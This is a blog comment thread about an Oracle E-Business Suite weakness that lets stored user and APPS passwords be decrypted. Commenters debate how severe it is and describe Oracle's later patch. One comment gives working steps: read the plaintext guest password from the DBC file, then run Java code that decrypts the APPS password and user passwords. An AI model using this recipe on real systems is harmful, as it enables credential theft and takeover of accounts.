-
Website
http://awads.net/wp/ -
Original page
http://awads.net/wp/2006/12/12/oracle-e-business-suite-vulnerability-users-passwords-decrypted/ -
Subscribe
All Comments -
Community
-
-
Top Commenters
-
Popular Threads
To be fair, the Java classes do have file permissions, so you would have to be a part of that OS group (or the OS user itself) in order to load them. So you've already had a breach in OS security at that point.
For the database side, you have to have access to the package, so that would already be a database security breach, like you said.
I'm not sure it's a security problem. It's unsettling, for sure, but is it a security problem?
Since I have the APPS password on our development environment, I was able to change the FND_WEB_SEC package and run the query above. I now have the passwords for ALL the users on our development instance. These passwords happen to be the same in production, since our development instance is a clone of production.
So, simply, if you know passwords that you should not have known in the first place, I believe that this constitutes a security breach and can be categorized as a problem.
However, in this particular case, the APPS password holds the key to all other passwords. And the assumption is that whoever has the APPS password (and the associated privileges) is or should be a trusted person.
We cannot say for this that is bug. In addition to this, secuirty itself is not only software way. While you're clonning the envrionments, you simply re-set the all passwords with a dummy password, you cleam all outputs.
This should be part of the secuirty.
But it was good to have such a code sample.
Thanks
I was wondering how many people knew about this. The bigger issue to me is that if you know an application username / password and can read from the fnd_user table then you can find out the apps password.
Worse still using these techniques you can comprimise the apps password through a fairly unpriviledged account.
I had raised this as an issue with Oracle well over a year ago. I was told that it was not a security issue, since it required significant amount of database access to exploit.
Acctualt you dont need to know apps password to get users password. You can get all users password only knowing a user password.
For example with your ERP user you can get the apps password then you can get any user's password.
I've coded an application (at 2005) then use the javaclass and it gets apps password then login with this password just like Oracle Discoverer.
http://www.milci.com/eAppsViewer</p>
hi.
in which schema in oracle i can find the fnd_user table?and FND_WEB_SEC package?
zokho, fnd_user is in applsys and fnd_web_sec is in apps.
hi again
im using oracle 9i.
i cant find any appsys schema in my oracle to have access to fnd_user and fnd_web_sec package!!
in which oracle version i can have have appsys schema???
or are there any table like fnd_user and package fnd_web_sec in oracle 9i?
Zokho, this is related to the Oracle E-Business Suite (EBS). If you do not have EBS, this does not apply to you.
hello eddie
i have an oracle 9i and one of my assignment in university is that how to decrypt users' password in oracle so i ve read several guides related to topic and i found that i should have a table in my oracle which is named fnd_user!!!
is there any other approach to decrypt passwords in oracle 9i?
thank u
best regards
zokho, Here is the documentation for Data Encryption Using DBMS_OBFUSCATION_TOOLKIT in 9i.
You may also want to visit forums.oracle.com and ask your questions there. Usually, you will get a faster response there.
Mehmet,
How do you get the apps password through a user account? I have a need for a custom application, the users need to login using Oracle e-business password and then I need the apps database password to start the session just like Discoverer. Any pointers on this one, would greatly appreciate.
Thanks
Nilesh
Oracle E-Business Suite authentication plugin in Ruby. You can use this plugin for Ruby on Rails applications that want to use Oracle EBS users and passwords for authentication. Or you can use this as an example how to decrypt Oracle EBS user passwords in Ruby :)
-Brian
As Oracle has written in the patch description now user passwords are stored in the following way:
1) at first SHA digest is made from user password
2) and then SHA digest is encrypted with APPS password and stored in encrypted_user_password column
When password verification is done then
1) encrypted_user_password is decrypted with APPS password
2) SHA1 of user password is compared with decrypted result
So it means that it will not be possible to find out all user passwords using APPS password as decryption key.
But as it seems to me if you will have SQL access to the database and if you will have at least one EBS login and password for this database then you will still be able to get APPS password.
If i am normal os user on system and have select any table privilege or select privilege on fnd_user table. I can easily break all the passwords even if i donot know the installation directory of oracle apps.
1. First step is to get guest user password
do the ps and try to find Ddbcfile
ps -eaf|grep Ddbcfile
from there you can get the FND_TOP location and DBCFILE location. The DBC file readable by all and there is plain text entry for guest user password.
2. Now you can easily set the classpath as you the APPL_TOP location and OAH_TOP location from ps command above
/usr/local/j2sdk1.4.2_15/jre/lib/rt.jar:/usr/local/j2sdk1.4.2_15/lib/dt.jar:/usr/local/j2sdk1.4.2_15/lib/tools.jar:/usr/local/j2sdk1.4.2_15/jre/lib/charsets.jar:/usr02/app/applebid/admin/ebid/java/appsborg2.zip::/usr02/app/applebid/product/8.0.6/forms60/java:/usr02/app/applebid/admin/ebid/java:/export/home/applebt1
3. Now write a simple Java code
public class GetPassword {
public static void main(String[] args) {
String appspassword=new String();
String guest_pwd=new String();
String userpass=new String();
String encrypted_foundation_passsword=new String();
String encrypted_passsword=new String();
guest_pwd="GUEST/ORACE"; /* fvalue got from dbc file */
encrypted_foundation_passsword="fafasfafafaf"; /* value got from fnd_user table for GUEST user */
encrypted_passsword="rfsfsfsafsfsfsf"; /* value got from fnd_user table for given user */
appspassword= oracle.apps.fnd.security.WebSessionManagerProc.decrypt(guest_pwd, encrypted_foundation_passsword);
userpass= oracle.apps.fnd.security.WebSessionManagerProc.decrypt(appspassword,encrypted_passsword);
System.out.println("user password:"+userpass);
System.out.println(" apps password:"+appspassword);
}
}
4. compile and run and you will get the user and apps password.
can you give a link of the final exxecutable that you mentioned?
Thank you